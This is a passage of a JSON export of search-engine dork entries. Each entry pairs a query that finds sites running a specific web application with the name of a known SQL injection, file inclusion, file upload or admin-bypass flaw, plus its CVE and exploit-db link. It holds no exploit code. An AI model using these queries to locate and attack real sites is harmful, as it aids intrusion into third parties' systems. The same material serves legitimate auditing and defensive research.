KG", "id": 2210}, {"short description": "\"ATutor 1.6.4\"", "long description": "ATutor 1.6.4 Multiple Cross Site Scripting - CVE: 2010-0971: http://www.exploit-db.com/exploits/11685", "submited": "2010-11-15", "request": "\"ATutor 1.6.4\"", "id": 2211}, {"short description": "\"Search | Invite | Mail | Blog | Forum\"", "long description": "Myspace Clone Script Remote SQL Injection Vulnerability - CVE: 2007-5992: http://www.exploit-db.com/exploits/4622", "submited": "2010-11-15", "request": "\"Search | Invite | Mail | Blog | Forum\"", "id": 2213}, {"short description": "inurl:\"index.php?option=com_portfolio\"", "long description": "Mambo Component Portfolio 1.0 (categoryId) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5139", "submited": "2010-11-15", "request": "inurl:\"index.php?option=com_portfolio\"", "id": 2214}, {"short description": "Powered by Article DashBoard", "long description": "Article Friendly SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11530", "submited": "2010-11-15", "request": "Powered by Article DashBoard", "id": 2215}, {"short description": "elkagroup - Image Gallery v1.0 - All right reserved", "long description": "elkagroup Image Gallery 1.0 Arbitrary File Upload Vulnerability - CVE: 2009-1446: http://www.exploit-db.com/exploits/8514", "submited": "2010-11-15", "request": "elkagroup - Image Gallery v1.0 - All right reserved", "id": 2216}, {"short description": "inurl:post.php?Category=Garage", "long description": "GarageSales Remote Upload Vulnerability: http://www.exploit-db.com/exploits/12128", "submited": "2010-11-15", "request": "inurl:post.php?Category=Garage", "id": 2219}, {"short description": "intext:\"Powered by CLscript.com\"", "long description": "CLScript.com Classifieds Software SQL Injection Vunerability - CVE: 2010-1660: http://www.exploit-db.com/exploits/12423", "submited": "2010-11-15", "request": "intext:\"Powered by CLscript.com\"", "id": 2221}, {"short description": "\"Send amazing 
greetings to your friends and relative!\"", "long description": "greeting card Remote Upload Vulnerability: http://www.exploit-db.com/exploits/13751", "submited": "2010-11-15", "request": "\"Send amazing greetings to your friends and relative!\"", "id": 2222}, {"short description": "inurl:\"index.php?option=com_oziogallery\"", "long description": "Joomla Ozio Gallery Component (com_oziogallery) SQL Injection Vulnerability - CVE: 2010-2910: http://www.exploit-db.com/exploits/14462", "submited": "2010-11-15", "request": "inurl:\"index.php?option=com_oziogallery\"", "id": 2223}, {"short description": "\"Powered by Content Injector v1.53\"", "long description": "Content Injector 1.53 (index.php) Remote SQL Injection Vulnerability - CVE: 2007-6394: http://www.exploit-db.com/exploits/4706", "submited": "2010-11-15", "request": "\"Powered by Content Injector v1.53\"", "id": 2224}, {"short description": "inurl:tabid/176/Default.aspx OR inurl:portals/0/", "long description": "DotNetNuke Remote File upload Vulnerability: http://www.exploit-db.com/exploits/12700", "submited": "2010-11-15", "request": "inurl:tabid/176/Default.aspx OR inurl:portals/0/", "id": 2225}, {"short description": "inurl:\"click.php?hostid=\"", "long description": "Adult Banner Exchange Website (targetid) SQL Injection Vulnerability - CVE: 2008-6101: http://www.exploit-db.com/exploits/6909", "submited": "2010-11-15", "request": "inurl:\"click.php?hostid=\"", "id": 2226}, {"short description": "inurl:/tiny_mce/plugins/filemanager/", "long description": "TinyMCE MCFileManager 2.1.2 Arbitrary File Upload Vulnerability: http://www.exploit-db.com/exploits/15194", "submited": "2010-11-15", "request": "inurl:/tiny_mce/plugins/filemanager/", "id": 2227}, {"short description": "inurl:\"search_results.php?browse=1\"", "long description": "SoftBizScripts Dating Script SQL Injection Vunerability - CVE: 2006-3271: http://www.exploit-db.com/exploits/12438", "submited": "2010-11-15", "request": 
"inurl:\"search_results.php?browse=1\"", "id": 2229}, {"short description": "\"powered by fuzzylime\"", "long description": "fuzzylime cms 3.01 (admindir) Remote File Inclusion Vulnerability - CVE: 2008-1405: http://www.exploit-db.com/exploits/5260", "submited": "2010-11-15", "request": "\"powered by fuzzylime\"", "id": 2230}, {"short description": "Powered by ThinkAdmin", "long description": "ThinkAdmin (page.php) Sql Injection Vulnerability: http://www.exploit-db.com/exploits/11296", "submited": "2010-11-15", "request": "Powered by ThinkAdmin", "id": 2231}, {"short description": "phpBazar Ver. 2.1.0", "long description": "phpBazar-2.1.1fix Remote Administration-Panel Vulnerability - CVE: 2009-4222: http://www.exploit-db.com/exploits/10233", "submited": "2010-11-15", "request": "phpBazar Ver. 2.1.0", "id": 2232}, {"short description": "inurl:gotourl.php?id=", "long description": "PozScripts Classified Auctions (gotourl.php id) SQL Injection Vuln - CVE: 2008-4755: http://www.exploit-db.com/exploits/6839", "submited": "2010-11-15", "request": "inurl:gotourl.php?id=", "id": 2233}, {"short description": "inurl:\"module=helpcenter\"", "long description": "Help Center Live 2.0.6(module=helpcenter&file=) Local File Inclusion - CVE: 2010-1652: http://www.exploit-db.com/exploits/12421", "submited": "2010-11-15", "request": "inurl:\"module=helpcenter\"", "id": 2234}, {"short description": "Powered By PHPhotoalbum", "long description": "PHPhotoalbum Remote File Upload Vulnerability - CVE: 2009-4819: http://www.exploit-db.com/exploits/10584", "submited": "2010-11-15", "request": "Powered By PHPhotoalbum", "id": 2235}, {"short description": "\"Eyeland Studio Inc. All Rights Reserved.\"", "long description": "Eyeland Studio Inc. SQL Injection Vulnerability: http://www.exploit-db.com/exploits/13855", "submited": "2010-11-15", "request": "\"Eyeland Studio Inc. 
All Rights Reserved.\"", "id": 2236}, {"short description": "\"Gallery powered by fMoblog\"", "long description": "Wordpress Plugin fMoblog 2.1 (id) SQL Injection Vulnerability - CVE: 2009-0968: http://www.exploit-db.com/exploits/8229", "submited": "2010-11-15", "request": "\"Gallery powered by fMoblog\"", "id": 2237}, {"short description": "\"Powered by Orca Interactive Forum Script\"", "long description": "Orca 2.0/2.0.2 (params.php) Remote File Inclusion Vulnerability - CVE: 2008-5167: http://www.exploit-db.com/exploits/5955", "submited": "2010-11-15", "request": "\"Powered by Orca Interactive Forum Script\"", "id": 2239}, {"short description": "Powered by Info Fisier", "long description": "Info Fisier v1.0 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10726", "submited": "2010-11-15", "request": "Powered by Info Fisier", "id": 2240}, {"short description": "inurl:\"browsecats.php?cid=\"", "long description": "SoftBizScripts Hosting Script SQL Injection Vunerability - CVE: 2005-3817: http://www.exploit-db.com/exploits/12439", "submited": "2010-11-15", "request": "inurl:\"browsecats.php?cid=\"", "id": 2242}, {"short description": "\"Powered by MySpace Content Zone\"", "long description": "MySpace Content Zone 3.x Remote File Upload Vulnerability - CVE: 2007-6668: http://www.exploit-db.com/exploits/4741", "submited": "2010-11-15", "request": "\"Powered by MySpace Content Zone\"", "id": 2243}, {"short description": "allinurl: \"com_actualite\"", "long description": "Joomla Component actualite 1.0 (id) SQL Injection Vulnerability - CVE: 2008-4617: http://www.exploit-db.com/exploits/5337", "submited": "2010-11-15", "request": "allinurl: \"com_actualite\"", "id": 2244}, {"short description": "inurl:\"com_book\"", "long description": "Joomla Component com_book SQL injection Vulnerability: http://www.exploit-db.com/exploits/11213", "submited": "2010-11-15", "request": "inurl:\"com_book\"", "id": 2245}, {"short description": "\"powered by AllMyGuests\"", 
"long description": "AllMyGuests 0.4.1 (AMG_id) Remote SQL Injection Vulnerability - CVE: 2008-1961: http://www.exploit-db.com/exploits/5469", "submited": "2010-11-15", "request": "\"powered by AllMyGuests\"", "id": 2246}, {"short description": "allinurl : /web3news/", "long description": "Web3news 0.95 (PHPSECURITYADMIN_PATH) Remote Include Vuln - CVE: 2006-4452: http://www.exploit-db.com/exploits/2269", "submited": "2010-11-15", "request": "allinurl : /web3news/", "id": 2248}, {"short description": "Powered by BoutikOne", "long description": "BoutikOne v1 SQL Injection Vulnerability - CVE: 2010-3479: http://www.exploit-db.com/exploits/15049", "submited": "2010-11-15", "request": "Powered by BoutikOne", "id": 2249}, {"short description": "\" Powered by Xpoze \"", "long description": "Xpoze 4.10 (home.html menu) Blind SQL Injection Vulnerability - CVE: 2008-6352: http://www.exploit-db.com/exploits/7432", "submited": "2010-11-15", "request": "\" Powered by Xpoze \"", "id": 2251}, {"short description": "Powered by ArticleMS from ArticleTrader", "long description": "Article Management System 2.1.2 Reinstall Vulnerability: http://www.exploit-db.com/exploits/12858", "submited": "2010-11-15", "request": "Powered by ArticleMS from ArticleTrader", "id": 2253}, {"short description": "allinurl:\"macgurublog.php?uid=\"", "long description": "e107 Plugin BLOG Engine 2.1.4 Remote SQL Injection Vulnerability - CVE: 2008-6438: http://www.exploit-db.com/exploits/6856", "submited": "2010-11-15", "request": "allinurl:\"macgurublog.php?uid=\"", "id": 2254}, {"short description": "\"powered by Sniggabo CMS\" inurl:article.php?id", "long description": "Sniggabo CMS (article.php id) Remote SQL Injection: http://www.exploit-db.com/exploits/8933", "submited": "2010-11-15", "request": "\"powered by Sniggabo CMS\" inurl:article.php?id", "id": 2255}, {"short description": "inurl:\"tr.php?id=\" Short Url & Url Tracker", "long description": "YourFreeWorld Short Url & Url Tracker (id) SQL 
Injection Vuln - CVE: 2008-4885: http://www.exploit-db.com/exploits/6940", "submited": "2010-11-15", "request": "inurl:\"tr.php?id=\" Short Url & Url Tracker", "id": 2256}, {"short description": "powered by AirvaeCommerce 3.0", "long description": "AirvaeCommerce 3.0 (pid) Remote SQL Injection Vulnerability - CVE: 2008-5223: http://www.exploit-db.com/exploits/5689", "submited": "2010-11-15", "request": "powered by AirvaeCommerce 3.0", "id": 2257}, {"short description": "inurl: \"tops_top.php? id_cat =\"", "long description": "Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability - CVE: 2008-3204: http://www.exploit-db.com/exploits/6044", "submited": "2010-11-15", "request": "inurl: \"tops_top.php? id_cat =\"", "id": 2258}, {"short description": "PHPEmailManager", "long description": "PHP Email Manager (remove.php ID) SQL Injection Vulnerability - CVE: 2009-3209: http://www.exploit-db.com/exploits/9470", "submited": "2010-11-15", "request": "PHPEmailManager", "id": 2259}, {"short description": "\"Powered By 0DayDB v2.3\"", "long description": "0DayDB 2.3 (delete id) Remote Admin Bypass: http://www.exploit-db.com/exploits/4896", "submited": "2010-11-15", "request": "\"Powered By 0DayDB v2.3\"", "id": 2260}, {"short description": "\"Powered by ExBB \"", "long description": "ExBB Italiano 0.2 exbb[home_path] Remote File Include Vulnerability - CVE: 2006-4488: http://www.exploit-db.com/exploits/2273", "submited": "2010-11-15", "request": "\"Powered by ExBB \"", "id": 2261}, {"short description": "\"Powered by Locazolist Copyright 2006\"", "long description": "LocazoList 2.01a beta5 (subcatID) Remote SQL Injection Vulnerability - CVE: 2007-0129: http://www.exploit-db.com/exploits/3073", "submited": "2010-11-15", "request": "\"Powered by Locazolist Copyright 2006\"", "id": 2262}, {"short description": "intext:\"Powered by Max.Blog\"", "long description": "Max.Blog 1.0.6 (show_post.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/7885", 
"submited": "2010-11-15", "request": "intext:\"Powered by Max.Blog\"", "id": 2264}, {"short description": "\"Powered by Active PHP Bookmarks v1.3\" inurl:.view_group.php?id=", "long description": "Active PHP Bookmarks v1.3 SQL Injection Vulnerability - CVE: 2008-3748: http://www.exploit-db.com/exploits/10597", "submited": "2010-11-15", "request": "\"Powered by Active PHP Bookmarks v1.3\" inurl:.view_group.php?id=", "id": 2265}, {"short description": "\"txx cms\"", "long description": "Txx CMS 0.2 Multiple Remote File Inclusion Vulnerabilities - CVE: 2007-4819: http://www.exploit-db.com/exploits/4381", "submited": "2010-11-15", "request": "\"txx cms\"", "id": 2266}, {"short description": "Powered by: XP Book v3.0", "long description": "XP Book v3.0 login Admin: http://www.exploit-db.com/exploits/10621", "submited": "2010-11-15", "request": "Powered by: XP Book v3.0", "id": 2267}, {"short description": "\"Powered by ispCP Omega\"", "long description": "ispCP Omega 1.0.4 Remote File Include Vulnerability: http://www.exploit-db.com/exploits/11681", "submited": "2010-11-15", "request": "\"Powered by ispCP Omega\"", "id": 2268}, {"short description": "inurl:\"printer.asp?forum=\"", "long description": "ASP Message Board 2.2.1c Remote SQL Injection Vulnerability - CVE: 2007-5887: http://www.exploit-db.com/exploits/4609", "submited": "2010-11-15", "request": "inurl:\"printer.asp?forum=\"", "id": 2269}, {"short description": "inurl:\"com_ownbiblio\" catalogue", "long description": "Joomla Component ownbiblio 1.5.3 (catid) SQL Injection Vulnerability - CVE: 2008-6184: http://www.exploit-db.com/exploits/6730", "submited": "2010-11-15", "request": "inurl:\"com_ownbiblio\" catalogue", "id": 2270}, {"short description": "\"This site is powered by CMS Made Simple version 1.\"", "long description": "CMS Made Simple 1.6.2 Local File Disclosure Vulnerability: http://www.exploit-db.com/exploits/9407", "submited": "2010-11-15", "request": "\"This site is powered by CMS Made Simple 
version 1.\"", "id": 2271}, {"short description": "\"CMS Webmanager-pro\"", "long description": "CMS WebManager-Pro Multiple Remote SQL Injection Vulnerabilities - CVE: 2008-2351: http://www.exploit-db.com/exploits/5641", "submited": "2010-11-15", "request": "\"CMS Webmanager-pro\"", "id": 2272}, {"short description": "inurl:\"/geeklog/\"", "long description": "GeekLog 1.7.0 (fckeditor) Arbitrary File Upload Vulnerability: http://www.exploit-db.com/exploits/15277", "submited": "2010-11-15", "request": "inurl:\"/geeklog/\"", "id": 2274}, {"short description": "\"Jax Calendar v1.34 by Jack (tR), www.jtr.de/scripting/php\"", "long description": "Jax Calendar 1.34 Remote Admin Access: http://www.exploit-db.com/exploits/10835", "submited": "2010-11-15", "request": "\"Jax Calendar v1.34 by Jack (tR), www.jtr.de/scripting/php\"", "id": 2276}, {"short description": "allinurl: \"index php p shop\"categ", "long description": "Koobi Pro 6.25 shop Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5412", "submited": "2010-11-15", "request": "allinurl: \"index php p shop\"categ", "id": 2277}, {"short description": "Powered by Platinum 7.6.b.5", "long description": "PHP-Nuke Platinum 7.6.b.5 Remote File Inclusion Vulnerability - CVE: 2007-5676: http://www.exploit-db.com/exploits/4563", "submited": "2010-11-15", "request": "Powered by Platinum 7.6.b.5", "id": 2278}, {"short description": "Rash Version: 1.2.1", "long description": "RQMS (Rash) 1.2.2 Multiple SQL Injection Vulnerabilities: http://www.exploit-db.com/exploits/8433", "submited": "2010-11-15", "request": "Rash Version: 1.2.1", "id": 2280}, {"short description": "Powered by: mevin productions", "long description": "Basic PHP Events Lister 2 Add Admin: http://www.exploit-db.com/exploits/10515", "submited": "2010-11-15", "request": "Powered by: mevin productions", "id": 2281}, {"short description": "inurl:/webCal3_detail.asp?event_id=", "long description": "WebCal (webCal3_detail.asp event_id) SQL 
Injection Vulnerability - CVE: 2009-1945: http://www.exploit-db.com/exploits/8857", "submited": "2010-11-15", "request": "inurl:/webCal3_detail.asp?event_id=", "id": 2282}, {"short description": "inurl:classifieds/view.php?category=", "long description": "YourFreeWorld Classifieds (category) Remote SQL Injection Vulnerability - CVE: 2008-3755: http://www.exploit-db.com/exploits/6945", "submited": "2010-11-15", "request": "inurl:classifieds/view.php?category=", "id": 2284}, {"short description": "\"Signkorn Guestbook 1.3\"", "long description": "Signkorn Guestbook 1.3 (dir_path) Remote File Include Vulnerability - CVE: 2006-4788: http://www.exploit-db.com/exploits/2354", "submited": "2010-11-15", "request": "\"Signkorn Guestbook 1.3\"", "id": 2285}, {"short description": "inurl:\"catalog/product/detail.php?cat=\"", "long description": "Webthaiapp detail.php(cat) Blind Sql injection Vulnerability: http://www.exploit-db.com/exploits/12467", "submited": "2010-11-15", "request": "inurl:\"catalog/product/detail.php?cat=\"", "id": 2287}, {"short description": "inurl: user_info.php?user_id= \" Or \" inurl: index.php?catid= \"", "long description": "Free Advertisment cms (user_info.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12572", "submited": "2010-11-15", "request": "inurl: user_info.php?user_id= \" Or \" inurl: index.php?catid= \"", "id": 2288}, {"short description": "Powered by:Traidnt Gallery Version 1.0.", "long description": "Traidnt Gallery add Admin: http://www.exploit-db.com/exploits/10629", "submited": "2010-11-15", "request": "Powered by:Traidnt Gallery Version 1.0.", "id": 2289}, {"short description": "inurl:\"powered by eggblog\"", "long description": "Eggblog 3.07 Remote (SQL Injection / Privilege Escalation) - CVE: 2006-2725: http://www.exploit-db.com/exploits/1842", "submited": "2010-11-15", "request": "inurl:\"powered by eggblog\"", "id": 2290}, {"short description": "\"pForum 1.30\"", "long description": "pForum 1.30 
(showprofil.php id) Remote SQL Injection Vulnerability - CVE: 2008-4355: http://www.exploit-db.com/exploits/6442", "submited": "2010-11-15", "request": "\"pForum 1.30\"", "id": 2291}, {"short description": "Powered By AJ Auction", "long description": "AJ Auction Pro Platinum (seller_id) SQL Injection Vulnerability - CVE: 2008-6004: http://www.exploit-db.com/exploits/6561", "submited": "2010-11-15", "request": "Powered By AJ Auction", "id": 2292}, {"short description": "faqview.asp?key", "long description": "Techno Dreams FAQ Manager 1.0 Remote SQL Injection Vulnerability - CVE: 2006-4892: http://www.exploit-db.com/exploits/2385", "submited": "2010-11-15", "request": "faqview.asp?key", "id": 2293}, {"short description": "\"Powered by: MFH v1\"", "long description": "Mega File Hosting Script 1.2 (fid) Remote SQL Injection Vulnerability - CVE: 2008-2521: http://www.exploit-db.com/exploits/5598", "submited": "2010-11-15", "request": "\"Powered by: MFH v1\"", "id": 2295}, {"short description": "inurl:\"com_beamospetition\"", "long description": "Joomla Component (com_beamospetition) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14502", "submited": "2010-11-15", "request": "inurl:\"com_beamospetition\"", "id": 2296}, {"short description": "intitle: phpBazar-AdminPanel", "long description": "phpBazar admin Information Disclosure Vulnerability: http://www.exploit-db.com/exploits/14439", "submited": "2010-11-15", "request": "intitle: phpBazar-AdminPanel", "id": 2297}, {"short description": "\"Powered By 4smart\"", "long description": "Magician Blog 1.0 (ids) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/9282", "submited": "2010-11-15", "request": "\"Powered By 4smart\"", "id": 2298}, {"short description": "allinurl: \"index.php?showlink\"links", "long description": "Koobi Pro 6.25 links Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5411", "submited": "2010-11-15", "request": "allinurl: 
\"index.php?showlink\"links", "id": 2299}, {"short description": "\"Aurora CMS\"", "long description": "Aurora CMS Remote SQL Injection: http://www.exploit-db.com/exploits/10609", "submited": "2010-11-15", "request": "\"Aurora CMS\"", "id": 2302}, {"short description": "inurl :/PhotoCart/", "long description": "Photo Cart 3.9 (adminprint.php) Remote File Include Vulnerability - CVE: 2006-6093: http://www.exploit-db.com/exploits/2817", "submited": "2010-11-15", "request": "inurl :/PhotoCart/", "id": 2303}, {"short description": "\"Powered by GetMyOwnArcade\"", "long description": "GetMyOwnArcade (search.php query) Remote SQL Injection Vulnerability - CVE: 2007-4386: http://www.exploit-db.com/exploits/4291", "submited": "2010-11-15", "request": "\"Powered by GetMyOwnArcade\"", "id": 2305}, {"short description": "Powered By : PersianBB.com", "long description": "PersianBB (iranian_music.php id) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6858", "submited": "2010-11-15", "request": "Powered By : PersianBB.com", "id": 2306}, {"short description": "alegrocart", "long description": "Alegro 1.2.1 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12278", "submited": "2010-11-15", "request": "alegrocart", "id": 2307}, {"short description": "inurl:/hbcms/php/", "long description": "HB CMS 1.7 SQL Injection: http://www.exploit-db.com/exploits/9835", "submited": "2010-11-15", "request": "inurl:/hbcms/php/", "id": 2308}, {"short description": "\"Powered by Simple PHP Text newsletter\"", "long description": "Simple PHP Newsletter 1.5 (olang) Local File Inclusion Vulnerabilities - CVE: 2009-0340: http://www.exploit-db.com/exploits/7813", "submited": "2010-11-15", "request": "\"Powered by Simple PHP Text newsletter\"", "id": 2309}, {"short description": "inurl:\"list.php?lcat_id=\"", "long description": "D-Tendencia Bt 2008 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10494", "submited": "2010-11-15", "request": 
"inurl:\"list.php?lcat_id=\"", "id": 2313}, {"short description": "allinurl: \"com_estateagent\"", "long description": "Mambo Component EstateAgent 0.1 Remote SQL Injection Vulnerability - CVE: 2008-0517: http://www.exploit-db.com/exploits/5016", "submited": "2010-11-15", "request": "allinurl: \"com_estateagent\"", "id": 2314}, {"short description": "powered by Php Blue Dragon Platinum", "long description": "Php Blue Dragon CMS 2.9 Remote File Include Vulnerability - CVE: 2006-2392: http://www.exploit-db.com/exploits/1779", "submited": "2010-11-15", "request": "powered by Php Blue Dragon Platinum", "id": 2315}, {"short description": "Designed and Developed by karkia E-commerce", "long description": "E-commerce Group (cat.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12696", "submited": "2010-11-15", "request": "Designed and Developed by karkia E-commerce", "id": 2316}, {"short description": "\"hlstats.php?mode=dailyawardinfo&award=\" hlstatsx", "long description": "HLstatsX v1.65 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10850", "submited": "2010-11-15", "request": "\"hlstats.php?mode=dailyawardinfo&award=\" hlstatsx", "id": 2317}, {"short description": "Powered by Plogger!", "long description": "Plogger Remote File Disclosure Vulnerability: http://www.exploit-db.com/exploits/14636", "submited": "2010-11-15", "request": "Powered by Plogger!", "id": 2318}, {"short description": ":intitle:\"A Better ASP User Gallery\"", "long description": "http://www.exploit-db.com/exploits/8012", "submited": "2010-11-15", "request": "", "id": 2320}, {"short description": "\"Powered by DZcms\"", "long description": "DZcms v.3.1 (products.php pcat) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/7722", "submited": "2010-11-15", "request": "\"Powered by DZcms\"", "id": 2321}, {"short description": "inurl:\"com_event\"", "long description": "Joomla Component com_event Multiple Vulnerabilities: 
http://www.exploit-db.com/exploits/12633", "submited": "2010-11-15", "request": "inurl:\"com_event\"", "id": 2323}, {"short description": "Help Desk Software by Kayako SupportSuite v3.70.02", "long description": "Kayako eSupport v3.70.02 SQL Injection Vulnerability - CVE: 2010-2911: http://www.exploit-db.com/exploits/14392", "submited": "2010-11-15", "request": "Help Desk Software by Kayako SupportSuite v3.70.02", "id": 2324}, {"short description": "inurl:\"/alternate_profiles/\"", "long description": "e107 Plugin alternate_profiles (id) SQL Injection Vulnerability - CVE: 2008-4785: http://www.exploit-db.com/exploits/6849", "submited": "2010-11-15", "request": "inurl:\"/alternate_profiles/\"", "id": 2326}, {"short description": "\"This website is powered by Mobius\"", "long description": "Mobius 1.4.4.1 (browse.php id) Remote SQL Injection Vulnerability - CVE: 2008-3420: http://www.exploit-db.com/exploits/6138", "submited": "2010-11-15", "request": "\"This website is powered by Mobius\"", "id": 2330}, {"short description": "intitle:WEBEYES GUEST BOOK inurl:.asp?id=", "long description": "WebEyes Guest Book v.3 (yorum.asp mesajid) SQL Injection Vulnerability - CVE: 2009-1950: http://www.exploit-db.com/exploits/8859", "submited": "2010-11-15", "request": "intitle:WEBEYES GUEST BOOK inurl:.asp?id=", "id": 2331}, {"short description": "\"visiteurs v2.0\"", "long description": "Les Visiteurs (Visitors) 2.0 (config.inc.php) File Include Vulnerability: http://www.exploit-db.com/exploits/2449", "submited": "2010-11-15", "request": "\"visiteurs v2.0\"", "id": 2332}, {"short description": "inurl:\"com_portfol\"", "long description": "Joomla Component com_portfol SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10844", "submited": "2010-11-15", "request": "inurl:\"com_portfol\"", "id": 2333}, {"short description": "\"Powered by ZeeMatri\"", "long description": "ZEEMATRI 3.0 (bannerclick.php adid) SQL Injection Vulnerability - CVE: 2008-5782: 
http://www.exploit-db.com/exploits/7072", "submited": "2010-11-15", "request": "\"Powered by ZeeMatri\"", "id": 2334}, {"short description": "inurl:tr.php?id= Banner", "long description": "Banner Management Script (tr.php id) Remote SQL Injection Vulnerability - CVE: 2008-3749: http://www.exploit-db.com/exploits/6276", "submited": "2010-11-15", "request": "inurl:tr.php?id= Banner", "id": 2335}, {"short description": "Powered By: 4images 1.7.1", "long description": "4images 1.7.1 Remote SQL Injection Vulnerability - CVE: 2006-5236: http://www.exploit-db.com/exploits/10572", "submited": "2010-11-15", "request": "Powered By: 4images 1.7.1", "id": 2336}, {"short description": "intext:\"Powered by Max.Blog\"", "long description": "Max.Blog 1.0.6 (submit_post.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/7898", "submited": "2010-11-15", "request": "intext:\"Powered by Max.Blog\"", "id": 2339}, {"short description": "intitle:USP FOSS Distribution", "long description": "USP FOSS Distribution 1.01 (dnld) Remote File Disclosure Vulnerability - CVE: 2007-2271: http://www.exploit-db.com/exploits/3794", "submited": "2010-11-15", "request": "intitle:USP FOSS Distribution", "id": 2340}, {"short description": "\"powered by dataface\" \"powered by xataface\"", "long description": "Xataface Admin Auth Bypass Vulnerability: http://www.exploit-db.com/exploits/11852", "submited": "2010-11-15", "request": "\"powered by dataface\" \"powered by xataface\"", "id": 2341}, {"short description": "inurl:\"vbplaza.php?do=\"", "long description": "vBulletin vbBux/vbPlaza 2.x (vbplaza.php) Blind SQL Injection Vuln: http://www.exploit-db.com/exploits/8784", "submited": "2010-11-15", "request": "inurl:\"vbplaza.php?do=\"", "id": 2344}, {"short description": "allintext:\"Powered by: TotalCalendar\"", "long description": "TotalCalendar 2.402 (view_event.php) Remote SQL Injection Vulns - CVE: 2007-3515: http://www.exploit-db.com/exploits/4130", "submited": "2010-11-15", 
"request": "allintext:\"Powered by: TotalCalendar\"", "id": 2346}, {"short description": "Powered by PHP Dir Submit - Directory Submission Script", "long description": "PHP Dir Submit (aid) Remote SQL Injection Vulnerability - CVE: 2009-3970: http://www.exploit-db.com/exploits/9484", "submited": "2010-11-15", "request": "Powered by PHP Dir Submit - Directory Submission Script", "id": 2347}, {"short description": "intitle:\"MAXSITE\"", "long description": "CMS MAXSITE 1.10 (category) Remote SQL Injection Vulnerability - CVE: 2008-2487: http://www.exploit-db.com/exploits/5676", "submited": "2010-11-15", "request": "intitle:\"MAXSITE\"", "id": 2348}, {"short description": "Power with ecsportal rel 6.5", "long description": "ecsportal rel 6.5 (article_view_photo.php id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/8848", "submited": "2010-11-15", "request": "Power with ecsportal rel 6.5", "id": 2350}, {"short description": "inurl:\"list.php?c=\"", "long description": "Prozilla Top 100 v1.2 Arbitrary Delete Stats Vulnerability - CVE: 2008-1785: http://www.exploit-db.com/exploits/5384", "submited": "2010-11-15", "request": "inurl:\"list.php?c=\"", "id": 2351}, {"short description": "inurl:\"weblink_cat_list.php?bcat_id=\"", "long description": "WHMCompleteSolution CMS sql Injection Vulnerability: http://www.exploit-db.com/exploits/10493", "submited": "2010-11-15", "request": "inurl:\"weblink_cat_list.php?bcat_id=\"", "id": 2352}, {"short description": "Powered by YaBBSM V2.5.0 Based on YABB SE", "long description": "YaBBSM 3.0.0 (Offline.php) Remote File Include Vulnerability - CVE: 2006-5413: http://www.exploit-db.com/exploits/2553", "submited": "2010-11-15", "request": "Powered by YaBBSM V2.5.0 Based on YABB SE", "id": 2354}, {"short description": "\"Powered by YDC\"", "long description": "YDC (kdlist.php cat) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6811", "submited": "2010-11-15", "request": "\"Powered by YDC\"", "id": 
2355}, {"short description": "Powered by emuCMS", "long description": "emuCMS 0.3 (cat_id) Remote SQL Injection Vulnerability - CVE: 2008-2891: http://www.exploit-db.com/exploits/5878", "submited": "2010-11-15", "request": "Powered by emuCMS", "id": 2356}, {"short description": "intitle:\"Rx08.ii36B.Rv\"", "long description": "RapidLeech Scripts Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/14430", "submited": "2010-11-15", "request": "intitle:\"Rx08.ii36B.Rv\"", "id": 2359}, {"short description": "allinurl:\"/lildbi/\"", "long description": "LILDBI Shell Upload Vulnerability: http://www.exploit-db.com/exploits/14443", "submited": "2010-11-15", "request": "allinurl:\"/lildbi/\"", "id": 2360}, {"short description": "intext:\"Design by BB Media.Org\"", "long description": "BBMedia Design's (news_more.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12718", "submited": "2010-11-15", "request": "intext:\"Design by BB Media.Org\"", "id": 2361}, {"short description": "calendar.asp?eventdetail", "long description": "AspWebCalendar 2008 Remote File Upload Vulnerability - CVE: 2008-2832: http://www.exploit-db.com/exploits/5850", "submited": "2010-11-15", "request": "calendar.asp?eventdetail", "id": 2362}, {"short description": "\"Copyrights 2005 Belgische Federale Overheidsdiensten\"", "long description": "Newsmanager 2.0 (RFI/RFD/SQL/PB) Multiple Remote Vulnerabilities - CVE: 2008-2342: http://www.exploit-db.com/exploits/5624", "submited": "2010-11-15", "request": "\"Copyrights 2005 Belgische Federale Overheidsdiensten\"", "id": 2363}, {"short description": "Powered by Multi Website 1.5", "long description": "Multi Website 1.5 (index php action) SQL Injection Vulnerability - CVE: 2009-3150: http://www.exploit-db.com/exploits/9344", "submited": "2010-11-15", "request": "Powered by Multi Website 1.5", "id": 2364}, {"short description": "Powered by iScripts VisualCaster", "long description": "SQli Vulnerability in iScripts 
